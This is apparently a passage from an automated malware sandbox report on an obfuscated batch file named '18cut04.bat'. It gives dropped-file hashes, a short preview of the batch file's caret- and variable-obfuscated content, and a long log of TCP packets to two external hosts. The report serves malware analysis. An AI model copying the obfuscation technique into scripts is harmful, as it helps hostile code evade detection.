                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                              Entropy (8bit):3.521640636343319
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Mrv:gv
                                                                                                                                                                                                              MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                              SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                              SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                              SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:ECHO is off...
                                                                                                                                                                                                              Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36
                                                                                                                                                                                                              Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                              MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                              SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                              SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                              SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                              File type:Unicode text, UTF-16, little-endian text, with very long lines (16554), with no line terminators
                                                                                                                                                                                                              Entropy (8bit):5.649567705520657
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                              • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                              File name:18cut04.bat
                                                                                                                                                                                                              File size:33'111 bytes
                                                                                                                                                                                                              MD5:063a08da4bdeef6cc43e5041f5db4ee5
                                                                                                                                                                                                              SHA1:469e79f961d6a5b205247b0cd3fbb72e0b8a4728
                                                                                                                                                                                                              SHA256:bdaa1a95ab24bc377cf918933934d852e74835d710fde085ec51c62e65311ea0
                                                                                                                                                                                                              SHA512:4fcf06d9d0242fe70b1cb9e5c499c9f128222adb84f2514df44c39e13ef87c6547c4d87f049277170929fa38a1ea7c1f4cbf18ab68844a5698a6cb3d868ead1b
                                                                                                                                                                                                              SSDEEP:192:eQy+Aup9iqpmtvDBL+BK7u/8giXTPLLt4w2431Va:eQ3EqpWvNLaKS/8Bj6+y
                                                                                                                                                                                                              TLSH:EBE243106A4FB5FF3244D318A1873AF634C598FD63FF64268D38BE5B4FB42269845A21
                                                                                                                                                                                                              File Content Preview:....>nul 2>&1 &cls.;@@ec%...^...............%%.........^.........%h%...^...............%^o of^%......^............%%..................^%f&f%.........^.........%^%...........^......%or /l %%i iN (1 1 1)Do (f%.........^.........%^%...........^......%or /l %
                                                                                                                                                                                                              Icon Hash:9686878b929a9886
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.187320948 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.187350988 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.187432051 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.194747925 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.194762945 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.044184923 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.044445992 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.107335091 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.107357025 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.107780933 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.119344950 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.163331032 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.974767923 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.974828005 CET44349704162.125.66.18192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.974888086 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.974888086 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.980762959 CET49704443192.168.2.7162.125.66.18
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.567049026 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.567076921 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.567163944 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.570441961 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.570470095 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.193089008 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.193408966 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.195631981 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.195638895 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.196266890 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.202049971 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.247332096 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346415997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346471071 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346545935 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346573114 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346601009 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346630096 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.346653938 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347280979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347280979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347280979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347301006 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347515106 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.347583055 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.401623011 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.401638985 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.448561907 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.465745926 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.465941906 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466037989 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466111898 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466129065 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466223001 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466228962 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466255903 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466299057 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466413021 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466547012 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466608047 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.466614962 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467272997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467344046 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467350960 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467603922 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467677116 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467684031 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467775106 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467863083 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467900038 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.467905998 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468014002 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468020916 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468772888 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468852997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468900919 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468909025 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.468962908 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584340096 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584414959 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584438086 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584456921 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584469080 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584480047 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584578991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584578991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.584592104 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585088968 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585108995 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585127115 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585138083 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585143089 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585184097 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585793018 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585823059 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585865974 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585875034 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585943937 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585995913 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.585995913 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.586004019 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.586051941 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.586749077 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.586930990 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587013960 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587029934 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587081909 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587703943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587737083 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587766886 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587770939 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587779999 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587805986 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.587851048 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.588538885 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.588613033 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.588709116 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.588872910 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.634727001 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.634836912 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.703900099 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.703970909 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704001904 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704020023 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704020023 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704044104 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704062939 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704395056 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704488993 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704499006 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.704555035 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707334042 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707391024 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707412958 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707422018 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707433939 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707454920 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707454920 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707464933 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707488060 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707519054 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707529068 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707559109 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707565069 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707597017 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707611084 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707614899 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707664967 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707672119 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707685947 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707732916 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707770109 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707818031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707818031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707818031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707818985 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707830906 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707844019 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707879066 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707884073 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707948923 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707958937 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.707966089 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708029985 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708735943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708771944 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708853006 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708853006 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708868980 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.708960056 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709108114 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709119081 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709183931 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709208965 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709270000 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709821939 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709863901 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709889889 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709897041 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.709929943 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710050106 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710078955 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710107088 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710113049 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710216999 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710937023 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.710964918 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.711035013 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.711035013 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.711042881 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.747904062 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.747984886 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.747999907 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.748049021 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822371960 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822496891 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822498083 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822513103 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822529078 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822593927 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822593927 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.822604895 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823200941 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823226929 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823333979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823333979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823343992 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823564053 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823579073 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823646069 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.823653936 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.824343920 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.824364901 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.824415922 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.824424982 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.824491978 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.827625036 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.827640057 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.827691078 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.827701092 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.827815056 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828144073 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828165054 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828191996 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828212976 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828241110 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828591108 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828605890 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828706026 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.828715086 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829282999 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829304934 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829360962 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829370022 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829386950 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829958916 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.829973936 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830051899 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830060959 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830873013 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830893993 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830959082 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.830974102 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831002951 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831002951 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831012964 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831031084 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831043005 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:26.831115007 CET49744443192.168.2.7172.65.251.78
